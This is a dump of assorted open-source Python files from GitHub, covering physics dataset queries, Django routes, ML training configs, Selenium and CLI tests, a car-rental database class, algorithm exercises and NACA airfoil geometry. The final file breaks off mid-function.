+{"seq_id":"71649777153","text":"#!/usr/bin/env python\nimport os\nimport json\nimport subprocess\nfrom utilities import load, dump, get_das\nimport logging\n\n\nupdate = True # requery everything\nverbose = False\n\nlogging.basicConfig(level=logging.DEBUG, format='%(asctime)s.%(msecs)03d %(levelname)s %(name)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S')\n\n# NanoAODv6\nnano_tag = 'Nano25Oct2019'\n\n\n# mc\n# note: this doesnt get the \"new_pmx\" or weirdly named \"ext\" samples... maybe okay?\n# for example: RunIIFall17NanoAODv6-PU2017_12Apr2018_Nano25Oct2019_ext_102X_mc2017_realistic_v7\n# RunIIFall17NanoAODv6-PU2017_12Apr2018_Nano25Oct2019_new_pmx_102X_mc2017_realistic_v7\nyear_tags = {\n '2016': f'RunIISummer16NanoAODv6-PUMoriond17_{nano_tag}_102X_mcRun2_asymptotic_v7',\n '2017': f'RunIIFall17NanoAODv6-PU2017_12Apr2018_{nano_tag}_102X_mc2017_realistic_v7',\n '2018': f'RunIIAutumn18NanoAODv6-{nano_tag}_102X_upgrade2018_realistic_v20',\n}\n\n# datasets (note, tune changes between 2016 and 2017/2018, but not always)\ndatasets = [\n # TT\n 'TTJets_TuneCUETP8M2T4_13TeV-amcatnloFXFX-pythia8',\n 'TTJets_TuneCUETP8M2T4_13TeV-madgraphMLM-pythia8',\n 'TTJets_TuneCP5_13TeV-amcatnloFXFX-pythia8',\n 'TTJets_TuneCP5_13TeV-madgraphMLM-pythia8',\n # HAA\n 'SUSY*HToAA*AToMuMu*AToTauTau*',\n # QCD\n # note: will also match patterns like Pt-*to*_, so manually delete those (muon enriched, for example)\n 'QCD_Pt_*to*_TuneCUETP8M1_13TeV_pythia8',\n 'QCD_Pt_*to*_TuneCP5_13TeV_pythia8',\n]\n\n\ndef get_mc(update=False,verbose=False):\n\n\n for year in year_tags:\n fname = f'mc_{year}'\n result = load(fname)\n for dataset in datasets:\n query = 'dataset dataset=/{}/{}*/NANOAODSIM'.format(dataset,year_tags[year])\n samples = get_das(query,verbose=verbose)\n if not samples: continue\n thesedatasets = set(s.split('/')[1] for s in samples)\n for thisdataset in thesedatasets:\n # NOTE: manually remove QCD_Pt-\n if 'QCD_Pt-' in thisdataset: continue\n if thisdataset not in result: result[thisdataset] = {}\n sampleMap = result[thisdataset].get('files',{})\n goodsamples = []\n for sample in samples:\n if not update and sample in sampleMap: continue\n if 'Validation error' in sample: continue\n if sample.split('/')[1]!=thisdataset: continue\n query = 'file dataset={}'.format(sample)\n sampleMap[sample] = get_das(query,verbose=verbose)\n goodsamples += [sample]\n \n result[thisdataset] = {'datasets': goodsamples, 'files': sampleMap}\n dump(fname,result)\n\nget_mc(update,verbose)\n","repo_name":"dntaylor/DeepDiTau","sub_path":"get_datasets.py","file_name":"get_datasets.py","file_ext":"py","file_size_in_byte":2748,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29491402268","text":"from django.conf.urls import url\r\nfrom . import views\r\nfrom django.contrib.staticfiles.urls import staticfiles_urlpatterns\r\nfrom django.contrib import staticfiles\r\n\r\n#\r\nurlpatterns = [\r\n url(r'^$', views.index, name=\"index\"),\r\n\r\n #浏览信息\r\n url(r'^check(?P[0-9]+)$', views.check, name=\"check\"),\r\n\r\n #图片上传\r\n #加载添加表单\r\n url(r'^ul$', views.ul, name=\"ul\"),\r\n #执行添加\r\n url(r'^upload$', views.upload, name=\"upload\"),\r\n\r\n #删除信息\r\n url(r'^delete/(?P[0-9]+)$', views.delete, name=\"delete\"),\r\n\r\n #编辑信息\r\n #加载编辑表单\r\n url(r'^edit/(?P[0-9]+)$', views.edit, name=\"edit\"),\r\n #执行修改\r\n url(r'^update/$', views.update, name=\"update\"),\r\n]\r\n\r\nurlpatterns += staticfiles_urlpatterns()\r\n","repo_name":"lvz5069au/week5_hw","sub_path":"album/Oam/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18791346226","text":"from collections import OrderedDict\n\ndef prototype_state():\n state = {} \n \n # Random seed\n state['seed'] = 1234\n # Logging level\n state['level'] = 'DEBUG'\n\n # These are unknown word placeholders\n state['oov'] = ''\n # Watch out for these\n state['unk_sym'] = 0\n state['eos_sym'] = 2\n state['sos_sym'] = 1\n\n state['n_samples'] = 40\n \n # These are end-of-sequence marks\n state['start_sym_sent'] = ''\n state['end_sym_sent'] = ''\n \n # Low-rank approximation activation function\n state['rank_n_activ'] = 'lambda x: x'\n\n # ----- SIZES ----\n # Dimensionality of hidden layers\n state['qdim'] = 512\n # Dimensionality of low-rank approximation\n state['rankdim'] = 256\n\n # Threshold to clip the gradient\n state['cutoff'] = 1.\n state['lr'] = 0.0001\n\n # Early stopping configuration\n state['patience'] = 5\n state['cost_threshold'] = 1.003\n \n # ----- TRAINING METHOD -----\n # Choose optimization algorithm\n state['updater'] = 'adam'\n \n # Batch size\n state['bs'] = 128 \n \n # We take this many minibatches, merge them,\n # sort the sentences according to their length and create\n # this many new batches with less padding.\n state['sort_k_batches'] = 20\n \n # Maximum sequence length / trim batches\n state['seqlen'] = 50\n\n # Should we use a deep output layer\n # and maxout on the outputs?\n state['deep_out'] = True\n state['maxout_out'] = True\n \n state['step_type'] = 'gated'\n state['rec_activation'] = \"lambda x: T.tanh(x)\"\n\n # Maximum number of iterations\n state['max_iters'] = 10\n state['save_dir'] = './'\n \n # ----- TRAINING PROCESS -----\n # Frequency of training error reports (in number of batches)\n state['trainFreq'] = 10\n # Validation frequency\n state['validFreq'] = 5000\n # Number of batches to process\n state['loopIters'] = 3000000\n # Maximum number of minutes to run\n state['timeStop'] = 24*60*31\n # Error level to stop at\n state['minerr'] = -1\n return state\n\ndef prototype_test():\n state = prototype_state()\n\n state['train_sentences'] = \"tests/data/test.word.train.pkl\"\n state['valid_sentences'] = \"tests/data/test.word.valid.pkl\"\n state['dictionary'] = \"tests/data/test.dict.pkl\" \n state['save_dir'] = \"tests/models/\"\n\n state['prefix'] = \"test_\"\n \n state['deep_out'] = True \n state['maxout_out'] = False \n\n #\n state['qdim'] = 5\n # Dimensionality of low-rank approximation\n state['rankdim'] = 5\n # \n\n state['bs'] = 10\n state['seqlen'] = 50\n return state\n","repo_name":"sordonia/rnn-lm","sub_path":"state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"61"} +{"seq_id":"11760243061","text":"\"\"\"Тестовое задание\"\"\"\nimport math\nfrom time import sleep\nfrom selenium import webdriver\nfrom selenium.webdriver.common.by import By\n\n\ndef calc(number):\n \"\"\"Функция для расчета значения по заданию\"\"\"\n return str(math.log(abs(12 * math.sin(int(number)))))\n\n\nLINK = 'http://suninjuly.github.io/get_attribute.html'\n\nbrowser = webdriver.Chrome()\n\ntry:\n browser.get(LINK)\n\n x_element = browser.find_element(By.ID, 'treasure')\n x = x_element.get_attribute('valuex')\n RESULT = calc(x)\n\n text_input = browser.find_element(By.ID, 'answer')\n text_input.send_keys(RESULT)\n\n checkbox = browser.find_element(By.ID, 'robotCheckbox')\n checkbox.click()\n\n radiobutton = browser.find_element(By.CSS_SELECTOR, '[value=\"robots\"]')\n radiobutton.click()\n\n submit_button = browser.find_element(By.CSS_SELECTOR, '[type=\"submit\"]')\n submit_button.click()\nfinally:\n sleep(30)\n browser.quit()\n","repo_name":"osteron/stepik-automation-python-testing","sub_path":"section2/lesson1_step7_checkbox_and_radiobutton.py","file_name":"lesson1_step7_checkbox_and_radiobutton.py","file_ext":"py","file_size_in_byte":963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35712379661","text":"def get_version_str():\n return \"\\n\".join([\n \"{project} Copyright (C) 2018 Robert Pilstål;\",\n \"This program comes with ABSOLUTELY NO WARRANTY.\",\n \"This is free software, and you are welcome to redistribute it\",\n \"under certain conditions; see supplied General Public License.\"\n ])\n\n\n# Library functions\n\n\n# Main; for callable scripts\ndef main():\n from argparse import ArgumentParser\n from sys import argv, stdin\n parser = ArgumentParser(\n description=\"{one line to give a brief idea of what the program does.}\")\n parser.add_argument(\n \"-a\", action=\"store_true\", default=False, help=\"Prints nothing\")\n parser.add_argument(\n \"-t\", nargs=1, default=[\"nothing\"], metavar=\"TEXT\",\n help=\"What to print\")\n parser.add_argument('-v', '--version', action='version',\n version=get_version_str())\n parser.add_argument(\n \"files\", nargs=\"*\", metavar=\"FILE\", help=\"Files for input\")\n arguments = parser.parse_args(argv[1:])\n files = arguments.files\n # Use stdin if no supplied files\n if len(arguments.files) == 0:\n files = [stdin]\n \n # Set variables here\n \n # Parse STDIN or files\n for f in files:\n infile = f\n # Open for reading if file path specified\n if isinstance(f, str):\n infile = open(f, 'r')\n for line in infile:\n print(line)\n infile.close()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ropil/stubs_py3","sub_path":"stub_reading_file_or_stdin_gpl.py","file_name":"stub_reading_file_or_stdin_gpl.py","file_ext":"py","file_size_in_byte":1484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70447656514","text":"import psycopg2\nimport lista_de_carros\n\nclass Car:\n def __init__(self, id, marca, modelo, ano, preco_diaria, disponivel=True):\n self.id = id\n self.marca = marca\n self.modelo = modelo\n self.ano = ano\n self.preco_diaria = preco_diaria\n self.disponivel = disponivel\n\n\nclass EmpresaAluguelCarros:\n\n def __init__(self):\n self.conn = psycopg2.connect(\n database=\"postgres\",\n user=\"postgres\",\n password=\"mysecret\",\n host=\"localhost\",\n port=\"15432\"\n )\n self.cursor = self.conn.cursor()\n self.criar_tabela()\n self.popular_carros(lista_de_carros.carros)\n\n def criar_tabela(self):\n self.cursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS carros (\n id SERIAL PRIMARY KEY NOT NULL,\n marca VARCHAR(255),\n modelo VARCHAR(255),\n ano INTEGER,\n placa VARCHAR(7) UNIQUE,\n preco_diaria NUMERIC(10, 2),\n disponivel BOOLEAN\n )\n \"\"\")\n self.conn.commit()\n\n def criar_carro(self, marca, modelo, ano, placa, preco_diaria, disponivel):\n try:\n ano = int(ano)\n except Exception:\n print((\"Ano inválido, tente novamente!\"))\n return\n try:\n preco_diaria = float(preco_diaria)\n except Exception:\n print((\"Preço inválido, tente novamente!\"))\n return\n query = \"INSERT INTO carros (marca, modelo, ano, placa, preco_diaria, disponivel) VALUES (%s, %s, %s, %s, %s, %s)\"\n values = (marca, modelo, ano, placa, preco_diaria, disponivel)\n self.cursor.execute(query, values)\n self.conn.commit()\n\n def popular_carros(self, carros):\n query = \"INSERT INTO carros (marca, modelo, ano, placa, preco_diaria, disponivel) VALUES (%s, %s, %s, %s, %s, %s) ON CONFLICT DO NOTHING\"\n for carro in carros:\n values = (carro[\"marca\"], carro[\"modelo\"], carro[\"ano\"], carro[\"placa\"], carro[\"preco_diaria\"], carro[\"disponivel\"])\n self.cursor.execute(query, values)\n self.conn.commit()\n\n def listar_carros(self):\n query = \"SELECT * FROM carros\"\n self.cursor.execute(query)\n carros = self.cursor.fetchall()\n return carros\n\n def buscar_carro(self, placa):\n query = \"SELECT * FROM carros WHERE placa = %s\"\n value = (placa,)\n self.cursor.execute(query, value)\n carro = self.cursor.fetchone()\n print(carro)\n\n def atualizar_carro(self, id, marca, modelo, ano, placa, preco_diaria, disponivel):\n try:\n ano = int(ano)\n except Exception:\n print((\"Ano inválido, tente novamente!\"))\n return\n try:\n preco_diaria = float(preco_diaria)\n except Exception:\n print((\"Preço inválido, tente novamente!\"))\n return\n query = \"UPDATE carros SET marca = %s, modelo = %s, ano = %s, placa = %s, preco_diaria = %s, disponivel = %s WHERE id = %s\"\n values = (marca, modelo, ano, placa, preco_diaria, disponivel, id)\n self.cursor.execute(query, values)\n self.conn.commit()\n\n\n def deletar_carro(self, id):\n query = \"DELETE FROM carros WHERE id = %s\"\n value = (id,)\n self.cursor.execute(query, value)\n self.conn.commit()\n","repo_name":"felipe-carvalhedo/aluguel_carros","sub_path":"aluguel_carros/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3416,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7322146559","text":"#This file prints Sq and S of bipartition as a function of the ratio of hoppings\r\n\r\nimport numpy as np\r\nfrom mpmath import mp\r\n\r\ndef Cij_0(eigvec, Np):\r\n\tCij=eigvec[:,0:Np]*eigvec[:,0:Np].T\r\n\treturn(Cij)\r\n\t\r\ndef FreeFermions(subsystem,C):\r\n\tC=mp.matrix([[C[x,y] for x in subsystem] for y in subsystem])\r\n\tC_eigval=mp.eigh(C, eigvals_only=True)\r\n\tEH_eigval=mp.matrix([mp.log(mp.fdiv(mp.fsub(mp.mpf(1.0),x),x)) for x in C_eigval])\r\n\tS=mp.re(mp.fsum([mp.log(mp.mpf(1.0)+mp.exp(-x))+mp.fdiv(x,mp.exp(x)+mp.mpf(1.0)) for x in EH_eigval]))\r\n\treturn(S)\r\n\r\n\r\n# def FreeFermions(eigvec, subsystem, FermiVector):\r\n\t# r=range(FermiVector)\r\n\t# Cij=mp.matrix([[mp.fsum([eigvec[i,k]*eigvec[j,k] for k in r]) for i in subsystem] for j in subsystem])\r\n\t# C_eigval=mp.eigsy(Cij, eigvals_only=True)\r\n\t# EH_eigval=mp.matrix([mp.log(mp.fdiv(mp.fsub(mp.mpf(1.0),x),x)) for x in C_eigval])\r\n\t# S=mp.re(mp.fsum([mp.log(mp.mpf(1.0)+mp.exp(-x))+mp.fdiv(x,mp.exp(x)+mp.mpf(1.0)) for x in EH_eigval]))\r\n\t# return(S)\r\n\t\r\nClosedLoop = False\r\n\r\n#t_vec= np.arange(0.01, 1.5, 0.01)#vector: contains hopping amplitude ratios\t\r\n\r\n#vector of all possible lenghts for the D part\r\nL_vec=[80,96] #input possible lengths of the chain\r\nwindow=4\r\nfor L in L_vec:\r\n\tNp = int(L / 2)\r\n\tl=[int(L/4), int(L/2), int(3*L/4), int(L)]\r\n\tA = list(range(l[0]))\r\n\tB = list(range(l[0],l[1]))\r\n\tD = list(range(l[1],l[2]))\r\n\tC = list(range(l[2],l[3]))\r\n\t\r\n\t\r\n\toutputfile=\"./Sq_function_of_hopping_L=\"+str(L)+\".dat\"#file in which I will write the results\r\n\tf1=open(outputfile,\"w\")\r\n\t\r\n\t \r\n\tpoint1= 1-window/L\r\n\tpoint2= 1+window/L\r\n\tv_vec= np.concatenate((np.linspace(0.01,point1-0.01,20),np.linspace(point1,point2,100),np.linspace(point2+0.01,1.5,20)))\r\n\t\t\t\r\n\tmp.dps=L*4 #sets the digits of the decimal numbers\r\n\t\r\n\tEND = L - 1\r\n\r\n\tif ClosedLoop == True:\r\n\t\tEND = L\r\n\t#buildHamiltonian\r\n\tH=mp.matrix(L)\r\n\r\n\tfor v in v_vec:\r\n\t\tprint(\"Currently working on...\")\r\n\t\tprint(\"L=\"+str(L)) \r\n\t\tprint(v)\r\n\t\tprint(\"................................\")\r\n\t\t#the following cicle takes care of the staggered hopping\r\n\t\tfor i in range(END):\r\n\t\t\tj = (i + 1) % L\r\n\t\t\tif i % 2 == 0:\r\n\t\t\t\tH[i, j] = -v\r\n\t\t\t\tH[j, i] = H[i, j]\r\n\t\t\telif j % 2 == 0:\r\n\t\t\t\tH[i, j] = -1\r\n\t\t\t\tH[j, i] = H[i, j]\r\n\t\t\t\t\t\t\r\n\r\n\t\t#find its eigenvalues and vectors\r\n\t\teigval, eigvec=mp.eigsy(H)\r\n\t\teigval, eigvec=mp.eig_sort(eigval,eigvec)\r\n\t\t\r\n\t\tCij=Cij_0(eigvec, Np)\r\n\t\t\t\r\n\t\t#From now on I will use the Free Fermions technique to calculate the entanglement entropies of the subsistems in units of log2\r\n\t\t\t\r\n\t\t\t\r\n\t\tSB=FreeFermions(B,Cij)/mp.log(mp.mpf(2.0))\r\n\t\t\t\r\n\t\tSAB=FreeFermions(A+B,Cij)/mp.log(mp.mpf(2.0))\r\n\t\t\t\r\n\t\tSBC=FreeFermions(B+C,Cij)/mp.log(mp.mpf(2.0))\r\n\t\t\t\t\t\t\r\n\t\tSABC=FreeFermions(D,Cij)/mp.log(mp.mpf(2.0)) \r\n\t\t\t\r\n\t\t\t\r\n\t\t\t\r\n\t\t#In the end I calculate Sqtopo ad proposed by Wen\r\n\t\tSq=(SAB+SBC-SB-SABC)\r\n\r\n\t\tf1.write (\"%.5f,%.40f\\n\" %(v, Sq))#print to file\r\n\r\n\tf1.close()\r\n\r\n","repo_name":"v-vitale/TopoSSH","sub_path":"Figure_2/scaling_even.py","file_name":"scaling_even.py","file_ext":"py","file_size_in_byte":2879,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"3239272756","text":"from collections import defaultdict\nclass Solution:\n def largestValsFromLabels(self, values: List[int], labels: List[int], num_wanted: int, use_limit: int) -> int:\n # greedy\n used = defaultdict(lambda: 0)\n vl = list(zip(values, labels))\n vl.sort(key=lambda x: -x[0])\n res = 0\n i = 0\n while i < len(vl):\n v, l = vl[i]\n if used[l] != use_limit:\n res += v\n num_wanted -= 1\n used[l] += 1\n if num_wanted == 0:\n return res\n i += 1\n return res","repo_name":"chien-wei/LeetCode","sub_path":"1090_Largest_Values_From_Labels.py","file_name":"1090_Largest_Values_From_Labels.py","file_ext":"py","file_size_in_byte":607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"9875591460","text":"import random\r\nimport os\r\nimport tensorflow as tf\r\nimport matplotlib.pyplot as plt\r\nfrom glob import glob\r\nfrom mirnet import mirnet_model\r\nfrom preprocess import get_dataset\r\nfrom keras import optimizers, callbacks\r\n\r\nrandom.seed(10)\r\n\r\n\r\nDATASET_DIR = \"./datasets/lol_dataset\"\r\n\r\nMAX_TRAIN_IMAGES = int(0.8*len(os.listdir(f\"{DATASET_DIR}/our485/high\")))\r\nNUM_EPOCH = 200\r\n\r\n\r\n# Define the Charbonnier loss function\r\ndef charbonnier_loss(y_true, y_pred):\r\n return tf.reduce_mean(tf.sqrt(tf.square(y_true - y_pred) + tf.square(1e-3)))\r\n\r\n\r\n# Define the PSNR metric\r\ndef peak_signal_noise_ratio(y_true, y_pred):\r\n return tf.image.psnr(y_pred, y_true, max_val=255.0)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n train_low_light_images = sorted(glob(f\"{DATASET_DIR}/our485/low/*\"))[:MAX_TRAIN_IMAGES]\r\n train_enhanced_images = sorted(glob(f\"{DATASET_DIR}/our485/high/*\"))[:MAX_TRAIN_IMAGES]\r\n\r\n val_low_light_images = sorted(glob(f\"{DATASET_DIR}/our485/low/*\"))[MAX_TRAIN_IMAGES:]\r\n val_enhanced_images = sorted(glob(f\"{DATASET_DIR}/our485/high/*\"))[MAX_TRAIN_IMAGES:]\r\n\r\n test_low_light_images = sorted(glob(f\"{DATASET_DIR}/eval15/low/*\"))\r\n test_enhanced_images = sorted(glob(f\"{DATASET_DIR}/eval15/high/*\"))\r\n\r\n train_dataset = get_dataset(train_low_light_images, train_enhanced_images)\r\n val_dataset = get_dataset(val_low_light_images, val_enhanced_images)\r\n\r\n model = mirnet_model(num_rrg=3, num_mrb=2, channels=64)\r\n\r\n optimizer = optimizers.Adam(learning_rate=1e-4)\r\n\r\n model.compile(\r\n optimizer=optimizer, \r\n loss=charbonnier_loss, \r\n metrics=[peak_signal_noise_ratio],\r\n )\r\n\r\n checkpoint_saver = callbacks.ModelCheckpoint(\r\n \"./checkpoints/mirnet-best_PSNR_{val_peak_signal_noise_ratio:.2f}/\",\r\n monitor=\"val_peak_signal_noise_ratio\",\r\n save_best_only=True,\r\n mode=\"max\",\r\n )\r\n\r\n lr_scheduler = callbacks.ReduceLROnPlateau(\r\n monitor=\"val_peak_signal_noise_ratio\",\r\n factor=0.5,\r\n patience=10,\r\n verbose=1,\r\n min_delta=1e-7,\r\n mode=\"max\",\r\n )\r\n\r\n history = model.fit(\r\n train_dataset,\r\n validation_data=val_dataset,\r\n epochs=NUM_EPOCH,\r\n callbacks=[lr_scheduler, checkpoint_saver],\r\n )\r\n\r\n '''\r\n plt.plot(history.history[\"loss\"], label=\"train_loss\")\r\n plt.plot(history.history[\"val_loss\"], label=\"val_loss\")\r\n plt.xlabel(\"Epochs\")\r\n plt.ylabel(\"Loss\")\r\n plt.title(\"Train and Validation Losses Over Epochs\", fontsize=14)\r\n plt.legend()\r\n plt.grid()\r\n plt.show()\r\n\r\n plt.plot(history.history[\"peak_signal_noise_ratio\"], label=\"train_psnr\")\r\n plt.plot(history.history[\"val_peak_signal_noise_ratio\"], label=\"val_psnr\")\r\n plt.xlabel(\"Epochs\")\r\n plt.ylabel(\"PSNR\")\r\n plt.title(\"Train and Validation PSNR Over Epochs\", fontsize=14)\r\n plt.legend()\r\n plt.grid()\r\n plt.show()\r\n\r\n '''","repo_name":"henryyantq/MIRNet-Keras","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2904,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41626651314","text":"import click\r\nimport click.testing\r\nimport markup\r\nimport os\r\nimport pytest\r\nimport tempfile\r\n\r\n\r\ndef test_file_not_found():\r\n runner = click.testing.CliRunner()\r\n result = runner.invoke(markup.cli.compile, ['this_is_a_file.mu'])\r\n assert result.exit_code == 1\r\n assert result.output != ''\r\n\r\n\r\ndef test_file_is_directory():\r\n runner = click.testing.CliRunner()\r\n with runner.isolated_filesystem():\r\n os.mkdir(\"folder\")\r\n result = runner.invoke(markup.cli.compile, ['folder'])\r\n assert result.exit_code == 1\r\n assert result.output != ''\r\n\r\n\r\ndef test_multi_file():\r\n runner = click.testing.CliRunner()\r\n with runner.isolated_filesystem():\r\n with open('main.mu', 'w') as f:\r\n f.write('Hello World!')\r\n with open('dual.mu', 'w') as f:\r\n f.write('Hello World2!')\r\n result = runner.invoke(markup.cli.compile, ['main.mu', 'dual.mu'])\r\n assert result.exit_code == 0\r\n assert result.output != ''\r\n","repo_name":"bob16795/markup","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"73713449474","text":"import pygame as pygame\nfrom Entorno import Entorno\n\npygame.init() # Inicialización de la librería\nclock = pygame.time.Clock() # Reloj para mantener FPS estable\nwindow = pygame.display.set_mode((1000, 500))\nentorno = Entorno()\n\nwhile True:\n clock.tick(1)\n accion = 0\n entorno.step(accion)\n entorno.render(window)\n pygame.display.update()\n","repo_name":"carlosoliva2000/rocket-racer","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27615920946","text":"# 105. Construct Binary Tree from Preorder and Inorder Traversal\n# Medium\n# Array, Hash Table, Divide and Conquer, Tree, Binary Tree\n# https://leetcode.com/problems/construct-binary-tree-from-preorder-and-inorder-traversal\n\n# Construct a binary tree from the lists in their given order.\n# def buildTree(self, preorder: List[int], inorder: List[int]) -> Optional[TreeNode]:\n# Input: preorder = [3,9,20,15,7], inorder = [9,3,15,20,7]\n# Output: [3,9,20,null,null,15,7]\n\nfrom typing import Optional, List\n\nclass TreeNode:\n # Definition for a binary tree node.\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n # Sorts + Recursion | Time: O(n^2) | Space: O(n)\n def buildTree(self, preorder: List[int], inorder: List[int]) -> Optional[TreeNode]:\n if not inorder:\n return None\n\n index = inorder.index(preorder.pop(0))\n root = TreeNode(inorder[index])\n root.left = self.buildTree(preorder, inorder[:index])\n root.right = self.buildTree(preorder, inorder[index + 1:])\n return root\n\n # Dictionary + Recursion | Time: O(n) | Space: O(n)\n def buildTree(self, preorder, inorder):\n preorder.reverse()\n idx_map = { v:i for i,v in enumerate(inorder) }\n return self.helper(idx_map, preorder, inorder, 0, len(preorder) - 1)\n\n def helper(self, idx_map, preorder, inorder, lower_bound, upper_bound):\n if lower_bound > upper_bound: return None # No nodes left / empty inorder list.\n root_val = preorder.pop()\n root = TreeNode(root_val)\n root.left = self.helper(\n idx_map, preorder, inorder, lower_bound, idx_map[root_val] - 1)\n root.right = self.helper(\n idx_map, preorder, inorder, idx_map[root_val] + 1, upper_bound)\n return root","repo_name":"daviscvance/Practice","sub_path":"Leetcode/Python/binary_trees/medium/105-construct-binary-tree-from-preorder-and-inorder-traversal.py","file_name":"105-construct-binary-tree-from-preorder-and-inorder-traversal.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16830438578","text":"import datetime\nimport cx_Oracle\nimport pandas as pd\n\n\n#here getting previous income from DB\ndef get_prev_income (supp_id,timescale, all_cust, cust_name,conn):\n cur=conn.cursor()\n outVal=cur.var(cx_Oracle.CURSOR)\n sql=\"\"\" declare\n -- Boolean parameters are translated from/to integers: \n -- 0/1/null <--> false/true/null \n p_all_customers boolean := sys.diutil.int_to_bool(:p_all_customers);\n begin\n als_stat.find_com_income(p_label_timescale => :p_label_timescale,\n p_supplier_id => :p_supplier_id,\n p_all_customers => p_all_customers,\n p_customer_name => :p_customer_name,\n v_res_crs => :v_res_crs);\n end;\"\"\"\n cur.execute(sql,p_label_timescale=timescale,p_supplier_id=supp_id,p_all_customers=all_cust,p_customer_name=cust_name,v_res_crs=outVal)\n res=outVal.getvalue().fetchall()\n return res\n\n\n\n#evaluation of imported file\ndef evaluation(df):\n if df.shape[0] < 5:\n return 0\n elif isinstance(df['date'], datetime.datetime):\n return 0\n\n elif (df['income'].any() ==''):\n return 0\n\n\n\n","repo_name":"agnesvam/Income-Forecast-module","sub_path":"income.py","file_name":"income.py","file_ext":"py","file_size_in_byte":1142,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"33743305039","text":"b, n = input().split()\nn = int(n)\nbase = 0\n\nfor i in range(len(b)):\n num = b[-1] # 마지막 글자만 추출\n \n if num.isalpha(): # 알파벳인 경우 -55 (A-55 = 10)\n num = ord(num) - 55\n \n # 10진법 변환 (진법 거듭제곱 후 더하기)\n base = base + int(num) * (n ** i)\n b = b[0:len(b)-1]\n\nprint(base)","repo_name":"minhuikim/Algorithm","sub_path":"python/backjoon/2745_base_conversion2.py","file_name":"2745_base_conversion2.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"12881028865","text":"import logging\nfrom math import atan, cos, pi, sin, sqrt\nfrom operator import itemgetter\n\nfrom OCC.wrapper.GeomLProp import GeomLProp_CLProps\n\n__all__ = [\"naca4_points\"]\n\n\ndef linspace(start, stop, n):\n \"\"\"Yield ``n`` values between ``start`` and ``stop`` with linear spacing.\n\n :param float start: start value\n :param float stop: end value\n :param int n: number of points\n :rtype: collections.Iterable[float]\n \"\"\"\n step = (stop - start) / (n - 1.)\n current = start\n yield current\n for _ in range(n - 2):\n current += step\n yield current\n yield stop\n\n\ndef cosspace(start, stop, n, theta1=0, theta2=0.5 * pi):\n \"\"\"Yield ``n`` values between ``start`` and ``stop`` with cosine spacing:\n ``|| | | | | |``.\n\n :param float start: start value\n :param float stop: end value\n :param int n: number of points\n :param float theta1: start angle in radians (``0`` by default).\n :param float theta2: end angle in radians (``1/2 * pi`` by default).\n :rtype: collections.Iterable[float]\n \"\"\"\n step_theta = (theta2 - theta1) / (n - 1.)\n dtheta = cos(theta1) - cos(theta2)\n dlength = stop - start\n yield start\n theta = theta1\n for _ in range(n - 2):\n theta += step_theta\n yield start + (cos(theta1) - cos(theta)) / dtheta * dlength\n yield stop\n\n\ndef naca4_points(s, n, sampling=\"linear\", sharp_te=True):\n \"\"\"Return ``n`` xy coordinates for camber, upper and lower lines of a\n NACA 4-digit airfoil. Sampling of xc-coordinates is either ``'linear'``\n (default) or ``'cosine'`` between 0 and 1. Airfoil will be closed by\n default (``sharp_te=True``), but can also be open. Usage:\n\n >>> naca4_points(\"0012\", 50)\n ([(0.0, 0.0), ...],\n [(0.0, 0.0), ...],\n [(0.0, 0.0), ...],\n )\n\n :param str s: NACA string, e.g. \"0012\".\n :param int n: number of points per side.\n :param str sampling: \"linear\" or \"cosine\".\n :param bool sharp_te: closed TE or not?\n :returns: (xy_camber, xy_upper, xy_lower)\n :rtype: (list[(float, float)], list[(float, float)], list[(float, float)])\n \"\"\"\n m = int(s[0]) / 100.\n p = int(s[1]) / 10.\n t = int(s[2:4]) / 100.\n\n # do sanity check on inputs\n if m == 0 and p != 0:\n msg = (\"Airfoil with camber (m = 0), should have p = 0. Found p = {}. \"\n \"Forcing p = 0.\")\n logging.warning(msg.format(p))\n p = 0\n elif m != 0 and p == 0:\n msg = \"Maximum camber position can not be 0. Received p = {}.\"\n raise RuntimeError(msg.format(p))\n if t == 0:\n msg = \"Impossible to have zero-thickness airfoil.\"\n raise RuntimeError(msg)\n\n c0 = 0.2969\n c1 = -0.1260\n c2 = -0.3516\n c3 = 0.2843\n if sharp_te:\n c4 = -0.1036\n else:\n c4 = -0.1015\n\n # make x-spacing\n if sampling == \"linear\":\n xgen = linspace(0, 1, n)\n elif sampling == \"cosine\":\n xgen = cosspace(0, 1, n)\n else:\n msg = \"sampling is either 'linear' or 'cosine', not {}\"\n raise 